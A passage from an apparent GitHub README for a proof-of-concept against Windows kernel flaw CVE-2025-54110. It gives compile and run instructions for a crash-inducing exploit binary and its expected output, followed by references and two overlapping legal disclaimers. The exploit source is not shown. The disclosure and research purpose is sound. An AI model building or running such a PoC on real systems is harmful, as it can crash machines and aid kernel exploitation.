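        print(f"{i:2d}. {name}")
```

Note that `Sample_ValidateBufferSize` matches three keywords yet never appears in the ranking: its score of 0.990 with equal lengths fails step 1, which is the point of applying the score filter first. Once symbol servers have been attached (the "Setting Symbol Servers" step of the workflow), the `FUN_*` labels in a real export become symbolic names and step 2 starts to contribute.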
## Build and Run
### Prerequisites
```
- Windows 10/11 (x64)
- Visual Studio 2019+ or MinGW-w64
- Administrator privileges (for syscall access)
```
### Compilation
```
# In an x64 Native Tools command prompt for VS 20xx
# With Visual Studio
cl.exe /Fe:poc64.exe precise_overflow_bsod.c ntdll.lib
# or
cl poc.c /link /SUBSYSTEM:CONSOLE
```
```
# With MinGW
gcc precise_overflow_bsod.c -o poc64.exe -lntdll
```
### Execution
```
# Run with administrator privileges
.\poc64.exe
```
**Expected output:**
```
[+] Current user: DESKTOP-XXXXXXX\user
[+] Current PID: 1234
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[+] System is still running - protections may be active.
```
## Resources and References
### Official Sources
- [Microsoft Security Advisory - CVE-2025-54110](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110)
- [CWE-190: Integer Overflow or Wraparound](https://cwe.mitre.org/data/definitions/190.html)
- [Windows Kernel Internals - Microsoft Docs](https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/)
### Research Tools
- [Ghidra - NSA Software Reverse Engineering Suite](https://ghidra-sre.org/)
- [WinDbg - Windows Debugging Tools](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/)
### Related Reading
- [Kernel Exploit Development](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
- [Windows Kernel Exploitation](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver)
- [Patch Diffing with Ghidra](https://www.youtube.com/watch?v=K83T7iVla5s)
## Legal Disclaimer
This code is provided for educational purposes only.
Do not use this code for:
• Unauthorized access to computer systems
• Malicious attacks or damage
• Any illegal activity
The author accepts no responsibility for misuse.
Users must comply with all applicable laws.
**By using this code you acknowledge that:**
1. You have authorization to test on the target systems
2. You understand the legal implications in your jurisdiction
3. You take full responsibility for your actions
4. This is for learning, not for malicious activity
## Legal Disclaimer
This repository is strictly limited to educational, defensive security research and vulnerability reproduction purposes in controlled lab environments.
The information and proof-of-concept code are intended to help defenders, researchers and vendors understand and fix the reported vulnerability.
Unauthorized or malicious use of this code against systems without explicit permission may violate applicable laws and regulations.
The author does not encourage or condone illegal activity and accepts no responsibility for damage caused by misuse of this material.
This vulnerability disclosure report is intended for:
1. Security research and education
2. Vendor notification and patch development
3. Protecting end users
4. Academic and defensive security purposes
**Prohibited uses:**
- Unauthorized access to computer systems
- Malicious exploitation
- Any illegal activity
The researcher performed all testing on personally owned systems in a controlled environment. No unauthorized access to third-party systems took place.
**Report version:** 1.0
**Last updated:** February 9, 2026
## Contact
For legitimate security research enquiries or educational collaboration:
**Responsible disclosure:**
- Security issues with this PoC → open a GitHub Issue
- Real CVE-2025-54110 exploits → report to [MSRC](https://msrc.microsoft.com/)
## License
```
MIT License - See LICENSE file for details
Educational software provided "as is" without warranty.
Use at your own risk.
```